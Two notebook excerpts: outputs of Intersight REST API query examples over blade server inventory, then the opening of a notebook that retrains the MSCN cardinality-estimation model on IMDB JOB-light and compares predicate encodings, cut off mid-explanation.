NumThreads: 16
2 of 15
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
NumThreads: 16
3 of 15
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
NumThreads: 16
4 of 15
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
NumThreads: 16
5 of 15
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
NumThreads: 16
6 of 15
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
NumThreads: 16
7 of 15
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
NumThreads: 16
8 of 15
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
NumThreads: 16
9 of 15
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
NumThreads: 16
10 of 15
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
NumThreads: 32
11 of 15
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
NumThreads: 16
12 of 15
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
NumThreads: 16
13 of 15
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
NumThreads: 16
14 of 15
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
NumThreads: 16
15 of 15
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
NumThreads: 16
###Markdown
--- Pagination, skip the first N results and return only the top X remaining results
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$skip=3&$top=5'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'Serial',
'NumThreads'
]
)
###Output
HTTP response: 200 OK
Objects returned: 5
1 of 5
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
NumThreads: 16
2 of 5
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
NumThreads: 16
3 of 5
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
NumThreads: 16
4 of 5
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
NumThreads: 16
5 of 5
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
NumThreads: 16
###Markdown
--- Return objects in a certain order (select only certain properties)
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$orderby=Serial&$select=Dn,Serial,Model'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'Serial'
]
)
###Output
HTTP response: 200 OK
Objects returned: 18
1 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
2 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
3 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
4 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
5 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
6 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
7 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
8 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
9 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
10 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
11 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
12 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
13 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
14 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
15 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
16 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
17 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
18 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
###Markdown
--- Return only a count of the matching objects, no objects or their properties
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$count=true'
)
# Display the results
print(f'Total matching objects: {results.get("Count")}')
###Output
HTTP response: 200 OK
Objects returned: 1
Total matching objects: 18
###Markdown
--- Return a count of matching objects with objects and their properties
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$inlinecount=allpages&$select=Dn,Model,Serial'
)
# Display the results
print(f'Total matching objects: {results.get("Count")}\n')
display_results(
results=results,
fields=[
'Model',
'Serial',
'NumThreads'
]
)
###Output
HTTP response: 200 OK
Objects returned: 18
Total matching objects: 18
1 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
NumThreads: N/A
2 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
NumThreads: N/A
3 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
NumThreads: N/A
4 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
NumThreads: N/A
5 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
NumThreads: N/A
6 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
NumThreads: N/A
7 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
NumThreads: N/A
8 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
NumThreads: N/A
9 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
NumThreads: N/A
10 of 18
DN: sys/chassis-3/blade-1
Model: UCSB-EX-M4-1
Serial: SRV107
NumThreads: N/A
11 of 18
DN: sys/chassis-3/blade-5
Model: UCSB-EX-M4-1
Serial: SRV126
NumThreads: N/A
12 of 18
DN: sys/chassis-4/blade-2
Model: UCSC-C3K-M4SRB
Serial: SRV112
NumThreads: N/A
13 of 18
DN: sys/chassis-5/blade-3
Model: UCSB-B480-M5
Serial: SRV125
NumThreads: N/A
14 of 18
DN: sys/chassis-3/blade-3
Model: UCSB-EX-M4-1
Serial: SRV108
NumThreads: N/A
15 of 18
DN: sys/chassis-3/blade-7
Model: UCSB-EX-M4-1
Serial: SRV110
NumThreads: N/A
16 of 18
DN: sys/chassis-4/blade-1
Model: UCSC-C3K-M4SRB
Serial: SRV111
NumThreads: N/A
17 of 18
DN: sys/chassis-5/blade-1
Model: UCSB-B200-M5
Serial: SRV122
NumThreads: N/A
18 of 18
DN: sys/chassis-5/blade-2
Model: UCSB-B200-M5
Serial: SRV124
NumThreads: N/A
###Markdown
--- Group objects by properties and aggregate results by values- Group all servers by Model and display the average number of CPUs per model.- Supported aggregates include: - min, max, average, and sum
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$apply=groupby((Model), aggregate(NumCpus with average as AverageCpuCount))'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'AverageCpuCount'
]
)
###Output
HTTP response: 200 OK
Objects returned: 4
1 of 4
DN: N/A
Model: UCSB-B200-M5
AverageCpuCount: 2
2 of 4
DN: N/A
Model: UCSB-B480-M5
AverageCpuCount: 4
3 of 4
DN: N/A
Model: UCSB-EX-M4-1
AverageCpuCount: 2
4 of 4
DN: N/A
Model: UCSC-C3K-M4SRB
AverageCpuCount: 2
###Markdown
--- Group objects by the total count of a value- Group all servers by Model and display the total number of servers for each Model.
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$apply=groupby((Model), aggregate($count as TotalCountOfServerModel))'
)
display_results(
results=results,
fields=[
'Model',
'TotalCountOfServerModel'
]
)
###Output
HTTP response: 200 OK
Objects returned: 4
1 of 4
DN: N/A
Model: UCSC-C3K-M4SRB
TotalCountOfServerModel: 4
2 of 4
DN: N/A
Model: UCSB-EX-M4-1
TotalCountOfServerModel: 8
3 of 4
DN: N/A
Model: UCSB-B480-M5
TotalCountOfServerModel: 2
4 of 4
DN: N/A
Model: UCSB-B200-M5
TotalCountOfServerModel: 4
###Markdown
--- Sort grouped objects with the `$orderby` parameter (using the `desc` keyword as an example)- Group all servers by Model and display the total number of servers for each Model.
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$apply=groupby((Model), aggregate($count as TotalCountOfServerModel))&$orderby=TotalCountOfServerModel desc'
)
# Display the results
display_results(
results=results,
fields=[
'Model',
'TotalCountOfServerModel'
]
)
###Output
HTTP response: 200 OK
Objects returned: 4
1 of 4
DN: N/A
Model: UCSB-EX-M4-1
TotalCountOfServerModel: 8
2 of 4
DN: N/A
Model: UCSB-B200-M5
TotalCountOfServerModel: 4
3 of 4
DN: N/A
Model: UCSC-C3K-M4SRB
TotalCountOfServerModel: 4
4 of 4
DN: N/A
Model: UCSB-B480-M5
TotalCountOfServerModel: 2
###Markdown
--- Include related resources with the queried resources
###Code
results = intersight(
method='GET',
endpoint='/compute/Blades',
params='$expand=Parent'
)
# Display the results
result_sample = results.get('Results')[0]
print(f'Dn: {result_sample["Dn"]}')
print(f'Parent Dn: {result_sample["Parent"].get("Dn")}')
###Output
HTTP response: 200 OK
Objects returned: 18
Dn: sys/chassis-5/blade-1
Parent Dn: sys/chassis-5
###Markdown
--- Search for resources- Allows the use of `$top`, `$skip`, `$orderby`, `$filter`, `$select`, & `$count`
###Code
results = intersight(
method='GET',
endpoint='/search/SearchItems',
# Single quotes required on the search string
# Outer double quotes will work also, without escaping inner single quotes
params='$filter=endswith(Dn,\'5\')'
)
# Display the results
display_results(
results=results,
fields=[
'ObjectType',
'EpDn',
'Serial',
'TotalMemory'
]
)
###Output
HTTP response: 200 OK
Objects returned: 50
1 of 50
DN: sys/chassis-3/blade-5
ObjectType: compute.PhysicalSummary
EpDn: N/A
Serial: SRV126
TotalMemory: 49152
2 of 50
DN: sys/rack-unit-5
ObjectType: compute.PhysicalSummary
EpDn: N/A
Serial: RK58
TotalMemory: 49152
3 of 50
DN: sys/rack-unit-5
ObjectType: compute.RackUnit
EpDn: N/A
Serial: RK58
TotalMemory: 49152
4 of 50
DN: sys/chassis-3/blade-5
ObjectType: compute.Blade
EpDn: N/A
Serial: SRV126
TotalMemory: 49152
5 of 50
DN: sys/chassis-3/blade-3/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-3/fabric-B/pc-1287
Serial: N/A
TotalMemory: N/A
6 of 50
DN: sys/chassis-5/blade-1/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-1/fabric-B/pc-1305
Serial: N/A
TotalMemory: N/A
7 of 50
DN: sys/chassis-3/blade-7/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-7/fabric-B/pc-1284
Serial: N/A
TotalMemory: N/A
8 of 50
DN: sys/chassis-5/blade-3/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-3/fabric-B/pc-1308
Serial: N/A
TotalMemory: N/A
9 of 50
DN: sys/chassis-5/blade-1/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-1/fabric-B/pc-1304
Serial: N/A
TotalMemory: N/A
10 of 50
DN: sys/chassis-5/blade-2/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-2/fabric-B/pc-1301
Serial: N/A
TotalMemory: N/A
11 of 50
DN: sys/chassis-5/blade-2/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-2/fabric-B/pc-1300
Serial: N/A
TotalMemory: N/A
12 of 50
DN: sys/chassis-3/blade-1/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-1/fabric-B/pc-1293
Serial: N/A
TotalMemory: N/A
13 of 50
DN: sys/chassis-3/blade-5/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-5/fabric-B/pc-1280
Serial: N/A
TotalMemory: N/A
14 of 50
DN: sys/chassis-5/blade-3/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-5/blade-3/fabric-B/pc-1309
Serial: N/A
TotalMemory: N/A
15 of 50
DN: sys/chassis-3/blade-3/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-3/fabric-B/pc-1288
Serial: N/A
TotalMemory: N/A
16 of 50
DN: sys/chassis-3/blade-5/adaptor-2/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-5/fabric-B/pc-1281
Serial: N/A
TotalMemory: N/A
17 of 50
DN: sys/chassis-3/blade-1/adaptor-1/ext-eth-5
ObjectType: adapter.ExtEthInterface
EpDn: sys/chassis-3/blade-1/fabric-B/pc-1292
Serial: N/A
TotalMemory: N/A
18 of 50
DN: sys/rack-unit-5
ObjectType: compute.PhysicalSummary
EpDn: N/A
Serial: RK58
TotalMemory: 49152
19 of 50
DN: sys/rack-unit-5
ObjectType: compute.RackUnit
EpDn: N/A
Serial: RK58
TotalMemory: 49152
20 of 50
DN: sys/chassis-3/blade-5
ObjectType: compute.PhysicalSummary
EpDn: N/A
Serial: SRV126
TotalMemory: 49152
21 of 50
DN: sys/chassis-5
ObjectType: equipment.Chassis
EpDn: N/A
Serial: CH42
TotalMemory: N/A
22 of 50
DN: sys/chassis-3/blade-5
ObjectType: compute.Blade
EpDn: N/A
Serial: SRV126
TotalMemory: 49152
23 of 50
DN: sys/chassis-4/enc-1/disk-25
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK694
TotalMemory: N/A
24 of 50
DN: sys/chassis-4/enc-1/disk-5
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK674
TotalMemory: N/A
25 of 50
DN: sys/chassis-4/enc-1/disk-35
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK704
TotalMemory: N/A
26 of 50
DN: sys/chassis-4/enc-1/disk-15
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK684
TotalMemory: N/A
27 of 50
DN: sys/chassis-4/enc-1/disk-45
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK714
TotalMemory: N/A
28 of 50
DN: sys/chassis-4/enc-1/disk-55
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: CHDISK724
TotalMemory: N/A
29 of 50
DN: sys/rack-unit-9/board/storage-SAS-1/disk-5
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: RKDISK476
TotalMemory: N/A
30 of 50
DN: sys/rack-unit-10/board/storage-SAS-1/disk-5
ObjectType: storage.PhysicalDisk
EpDn: N/A
Serial: RKDISK493
TotalMemory: N/A
31 of 50
DN: sys/rack-unit-6/equipped-slot-5
ObjectType: pci.Device
EpDn: N/A
Serial: RKCTLR79
TotalMemory: N/A
32 of 50
DN: sys/rack-unit-7/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
33 of 50
DN: sys/rack-unit-3/board/memarray-1/mem-45
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
34 of 50
DN: sys/chassis-4/blade-1/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2465
TotalMemory: N/A
35 of 50
DN: sys/chassis-4/blade-2/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2481
TotalMemory: N/A
36 of 50
DN: sys/rack-unit-3/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
37 of 50
DN: sys/rack-unit-3/board/memarray-1/mem-25
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
38 of 50
DN: sys/rack-unit-4/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
39 of 50
DN: sys/rack-unit-2/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
40 of 50
DN: sys/chassis-3/blade-3/board/memarray-1/mem-25
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2347
TotalMemory: N/A
41 of 50
DN: sys/rack-unit-10/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
42 of 50
DN: sys/chassis-3/blade-3/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2337
TotalMemory: N/A
43 of 50
DN: sys/chassis-5/blade-3/board/memarray-1/mem-45
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2787
TotalMemory: N/A
44 of 50
DN: sys/rack-unit-6/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial: RKMEM1889
TotalMemory: N/A
45 of 50
DN: sys/rack-unit-8/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
46 of 50
DN: sys/rack-unit-3/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
47 of 50
DN: sys/chassis-5/blade-3/board/memarray-1/mem-35
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2777
TotalMemory: N/A
48 of 50
DN: sys/chassis-4/blade-1/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial: SRVMEM2455
TotalMemory: N/A
49 of 50
DN: sys/rack-unit-4/board/memarray-1/mem-15
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
50 of 50
DN: sys/rack-unit-10/board/memarray-1/mem-5
ObjectType: memory.Unit
EpDn: N/A
Serial:
TotalMemory: N/A
|
notebooks/3-Cardinality_Models.ipynb | ###Markdown
3 - Overcoming SOTA Performance On IMDB With JOB-Light*By Marcus Schwarting and Andronicus Samsundar Rajasukumar*In this notebook, we will:- Introduce the Kipf et al. model that we wish to improve upon- Show various implementations of featurization routines, and discuss their pros and cons- Discuss changes to the Kipf implementation that yielded overall improvements in accuracy and training time. The performance benchmark that we wish to beat, as described in the literature on the JOB-light test query set on the IMDB dataset, is as follows:| Metric | Value || ---- | ---- ||Median | 3.82||90th Percentile| 78.4||95th Percentile|362||Max|1110||Mean|57.9|
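All of the figures above are q-errors, i.e. the multiplicative factor by which an estimate misses the true cardinality in either direction. A one-line illustration with made-up numbers:

```
est, actual = 500.0, 131.0
q_error = max(est / actual, actual / est)
print(q_error)  # ~3.82, comparable to the reported median
```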
###Code
#MODIFIED VERSION OF KIPF ET AL CODE (originally from https://github.com/andreaskipf/learnedcardinalities)#
import time
import os
import torch
from torch.autograd import Variable
from torch.utils.data import DataLoader
from mscn.util import *
from mscn.data import get_train_datasets, load_data, make_dataset
from mscn.model import SetConv
###Output
_____no_output_____
###Markdown
Introducing the Kipf MSCN Model The authors achieve the above benchmark performance by using a multi-set convolutional network (MSCN). We have re-implemented their methods with some changes that have marginally improved on the state of the art. Below we re-use some of their code infrastructure and point out important changes where they are applicable.
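For readers who have not seen the `SetConv` module imported from `mscn.model` below, here is a minimal sketch of the idea (our own simplification for illustration, not the exact Kipf et al. implementation): each set of feature vectors (table samples, predicates, joins) is passed element-wise through a small MLP, pooled with a masked average so that padding elements do not contribute, and the pooled vectors are concatenated and fed to an output MLP that predicts the normalized cardinality.

```
import torch
import torch.nn as nn

class SetConvSketch(nn.Module):
    """Simplified set-based cardinality model: per-element MLPs + masked average pooling."""
    def __init__(self, sample_feats, predicate_feats, join_feats, hid):
        super().__init__()
        self.sample_mlp = nn.Sequential(nn.Linear(sample_feats, hid), nn.ReLU())
        self.predicate_mlp = nn.Sequential(nn.Linear(predicate_feats, hid), nn.ReLU())
        self.join_mlp = nn.Sequential(nn.Linear(join_feats, hid), nn.ReLU())
        self.out_mlp = nn.Sequential(nn.Linear(3 * hid, hid), nn.ReLU(), nn.Linear(hid, 1), nn.Sigmoid())

    @staticmethod
    def masked_mean(x, mask):
        # x: (batch, set_size, hid); mask: (batch, set_size, 1), 1 for real elements, 0 for padding
        return (x * mask).sum(dim=1) / mask.sum(dim=1).clamp(min=1)

    def forward(self, samples, predicates, joins, s_mask, p_mask, j_mask):
        hs = self.masked_mean(self.sample_mlp(samples), s_mask)
        hp = self.masked_mean(self.predicate_mlp(predicates), p_mask)
        hj = self.masked_mean(self.join_mlp(joins), j_mask)
        return self.out_mlp(torch.cat([hs, hp, hj], dim=1))
```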
###Code
def unnormalize_torch(vals, min_val, max_val):
#Read from "imdb_max_min.csv"
vals = (vals * (max_val - min_val)) + min_val
return torch.exp(vals)
def qerror_loss(preds, targets, min_val, max_val):
#Returns Q-error, can also return MAE as desired.
qerror = []
preds = unnormalize_torch(preds, min_val, max_val)
targets = unnormalize_torch(targets, min_val, max_val)
for i in range(len(targets)):
if (preds[i] > targets[i]).cpu().data.numpy()[0]:
qerror.append(preds[i] / targets[i])
else:
qerror.append(targets[i] / preds[i])
return torch.mean(torch.cat(qerror))
def predict(model, data_loader):
#The workhorse. Evaluates the final model and runs predictions.
preds = []
t_total = 0.
model.eval()
for batch_idx, data_batch in enumerate(data_loader):
samples, predicates, joins, targets, sample_masks, predicate_masks, join_masks = data_batch
t = time.time()
outputs = model(samples, predicates, joins, sample_masks, predicate_masks, join_masks)
t_total += time.time() - t
for i in range(outputs.data.shape[0]):
preds.append(outputs.data[i])
return preds, t_total
def print_qerror(preds_unnorm, labels_unnorm):
qerror = []
for i in range(len(preds_unnorm)):
if preds_unnorm[i] > float(labels_unnorm[i]):
qerror.append(preds_unnorm[i] / float(labels_unnorm[i]))
else:
qerror.append(float(labels_unnorm[i]) / float(preds_unnorm[i]))
print(f"Median: {np.median(qerror)}")
print(f"90th percentile: {np.percentile(qerror, 90)}")
print(f"95th percentile: {np.percentile(qerror, 95)}")
print(f"99th percentile: {np.percentile(qerror, 99)}")
print(f"Max: {np.max(qerror)}")
print(f"Mean: {np.mean(qerror)}")
def train_and_predict(workload_name, num_queries=1000, num_epochs=100, \
batch_size=100, hid_units=256, verbose=False,write=False):
# Load training and validation data
num_materialized_samples = 1000
dicts, column_min_max_vals, min_val, max_val, labels_train, \
labels_test, max_num_joins, max_num_predicates, \
train_data, test_data = get_train_datasets('all_train_queries.sql', num_queries, \
num_materialized_samples)
table2vec, column2vec, op2vec, join2vec = dicts
# Train model
sample_feats = len(table2vec) + num_materialized_samples
predicate_feats = len(column2vec) + len(op2vec) + 1
join_feats = len(join2vec)
model = SetConv(sample_feats, predicate_feats, join_feats, hid_units)
optimizer = torch.optim.Adam(model.parameters(), lr=0.005) #lr=0.001 originally
train_data_loader = DataLoader(train_data, batch_size=batch_size)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
model.train()
for epoch in range(num_epochs):
loss_total = 0.
for batch_idx, data_batch in enumerate(train_data_loader):
samples, predicates, joins, targets, sample_masks, predicate_masks, join_masks = data_batch
optimizer.zero_grad()
outputs = model(samples, predicates, joins, sample_masks, predicate_masks, join_masks)
loss = qerror_loss(outputs, targets.float(), min_val, max_val)
loss_total += loss.item()
loss.backward()
optimizer.step()
if verbose:
print("Epoch {}, loss: {}".format(epoch, loss_total / len(train_data_loader)))
# Get final training and validation set predictions
preds_train, t_total = predict(model, train_data_loader)
if verbose:
print("Prediction time per training sample: {}".format(t_total / len(labels_train) * 1000))
preds_test, t_total = predict(model, test_data_loader)
if verbose:
print("Prediction time per validation sample: {}".format(t_total / len(labels_test) * 1000))
# Unnormalize
preds_train_unnorm = unnormalize_labels(preds_train, min_val, max_val)
labels_train_unnorm = unnormalize_labels(labels_train, min_val, max_val)
preds_test_unnorm = unnormalize_labels(preds_test, min_val, max_val)
labels_test_unnorm = unnormalize_labels(labels_test, min_val, max_val)
# Print metrics
if verbose:
print("\nQ-Error training set:")
print_qerror(preds_train_unnorm, labels_train_unnorm)
print("\nQ-Error validation set:")
print_qerror(preds_test_unnorm, labels_test_unnorm)
print("")
# Load test data
file_name = "workloads/" + workload_name
joins, predicates, tables, samples, label = load_data(file_name, num_materialized_samples)
# Get feature encoding and proper normalization
samples_test = encode_samples(tables, samples, table2vec)
predicates_test, joins_test = encode_data(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec)
labels_test, _, _ = normalize_labels(label, min_val, max_val)
if verbose:
print(f"Number of test samples: {len(labels_test)}")
max_num_predicates = max([len(p) for p in predicates_test])
max_num_joins = max([len(j) for j in joins_test])
# Get test set predictions
test_data = make_dataset(samples_test, predicates_test, joins_test, labels_test, max_num_joins, max_num_predicates)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
preds_test, t_total = predict(model, test_data_loader)
if verbose:
print(f"Prediction time per test sample: {t_total / len(labels_test) * 1000}")
# Unnormalize
preds_test_unnorm = unnormalize_labels(preds_test, min_val, max_val)
# Print metrics
print(f"\nQ-Error, {workload_name}:")
print_qerror(preds_test_unnorm, label)
# Write predictions
if write:
file_name = f"results/predictions_{workload_name}.csv"
os.makedirs(os.path.dirname(file_name), exist_ok=True)
with open(file_name, "w") as f:
for i in range(len(preds_test_unnorm)):
f.write(f'{preds_test_unnorm[i]},{label[i]}\n')
print('Original (recreated and retrained) MSCN from Kipf et. al.:\n')
start_time = time.time()
train_and_predict('job-light', num_queries=5000, num_epochs=1000, batch_size=100, hid_units=256)
print(f'Total Time: {round((time.time()-start_time),4)} seconds')
###Output
Original (recreated and retrained) MSCN from Kipf et. al.:
Q-Error, job-light:
Median: 3.829080001743435
90th percentile: 79.58870873669316
95th percentile: 381.1589145561346
99th percentile: 937.5885201549474
Max: 1271.7475329481463
Mean: 44.07001456032248
Total Time: 217.4167 seconds
###Markdown
Adjusted Data Encoding Below we show the difference between the original MSCN implementation of predicate data encoding and our featurized predicate encoding.
###Code
#### THE ORIGINAL CODE IS AVAILABLE FROM KIPF ET AL, mscn/utils.py ####
def encode_data(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec):
predicates_enc = []
joins_enc = []
for i, query in enumerate(predicates):
predicates_enc.append(list())
joins_enc.append(list())
for predicate in query:
if len(predicate) == 3:
# Proper predicate
column = predicate[0]
operator = predicate[1]
val = predicate[2]
norm_val = normalize_data(val, column, column_min_max_vals)
pred_vec = []
pred_vec.append(column2vec[column])
pred_vec.append(op2vec[operator])
pred_vec.append(norm_val)
pred_vec = np.hstack(pred_vec)
else:
pred_vec = np.zeros((len(column2vec) + len(op2vec) + 1))
predicates_enc[i].append(pred_vec)
for predicate in joins[i]:
# Join instruction
join_vec = join2vec[predicate]
joins_enc[i].append(join_vec)
return predicates_enc, joins_enc
#### OUR UPDATES TO KIPF ET AL DATA ENCODING SCHEMA ####
def encode_data_NEW(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec):
predicates_enc = []
joins_enc = []
for i, query in enumerate(predicates):
predicates_enc.append(list())
joins_enc.append(list())
for predicate in query:
column = predicate[0]
operator = predicate[1]
val = predicate[2]
norm_val = normalize_data(val, column, column_min_max_vals)
#MAJOR FEATURIZATION CHANGES HERE
col_onehot = column2vec[column]
oper_onehot = op2vec[operator]
pred_vec = np.zeros(len(col_onehot)*len(oper_onehot))
for j in range(len(col_onehot)):
                if col_onehot[j] == 1:
pred_vec[3*j:3*j+3]=oper_onehot*norm_val
predicates_enc[i].append(pred_vec)
for predicate in joins[i]:
# Join instruction
join_vec = join2vec[predicate]
joins_enc[i].append(join_vec)
return predicates_enc, joins_enc
###Output
_____no_output_____
###Markdown
Predicate Encoding Scheme Comparison Our main insight on improving the featurization is as follows. Suppose we have a query with the following predicates: $$(b<0.5) \wedge (d>0.2) \wedge (e=0.3)$$ on some set of attributes $\{a,b,c,d,e\}$, where we assume each normalized attribute ranges between $[0,1]$. Assuming an upward limit of four predicates, the Kipf implementation would featurize this predicate set as follows:```(Predicate on b)[0 1 0 0 0 1 0 0 0.5] a b c d e < > = val -- AND --(Predicate on d)[0 0 0 1 0 0 1 0 0.2] a b c d e < > = val -- AND --(Predicate on e)[0 0 0 0 1 0 0 1 0.3] a b c d e < > = val FINAL REPRESENTATION (assuming a four predicate maximum):[0 1 0 0 0 1 0 0 0.5 0 0 0 1 0 0 1 0 0.2 0 0 0 0 1 0 0 1 0.3 0 0 0 0 0 0 0 0 0] Final Length of Predicate Featurization: 36 (average of 7.2 values per table attribute)```By contrast, we choose to featurize this predicate set by reserving one slot per (attribute, operator) pair, in attribute order a b c d e and operator order < > =, and writing the normalized value into the matching slot:```[0 0 0 0.5 0 0 0 0 0 0 0.2 0 0 0 0.3] FINAL REPRESENTATION Final Length of Predicate Featurization: 15 (constant 3 values per table attribute)```There are a number of benefits to this featurization. First, there is no upward limit on the number of predicates that can be placed in a query; the predicate featurization length has no dependence on the number of predicates in a query. There is also no order dependence; that is, presumably $$[\color{green}{\text{0, 1, 0, 0, 0, 1, 0, 0, 0.5,}} \color{red}{\text{0, 0, 0, 1, 0, 0, 1, 0, 0.2,}} 0, 0, 0, 0, 1, 0, 0, 1, 0.3, 0, 0, 0, 0, 0, 0, 0, 0, 0]$$ and $$[ \color{red}{\text{0, 0, 0, 1, 0, 0, 1, 0, 0.2,}} \color{green}{\text{0, 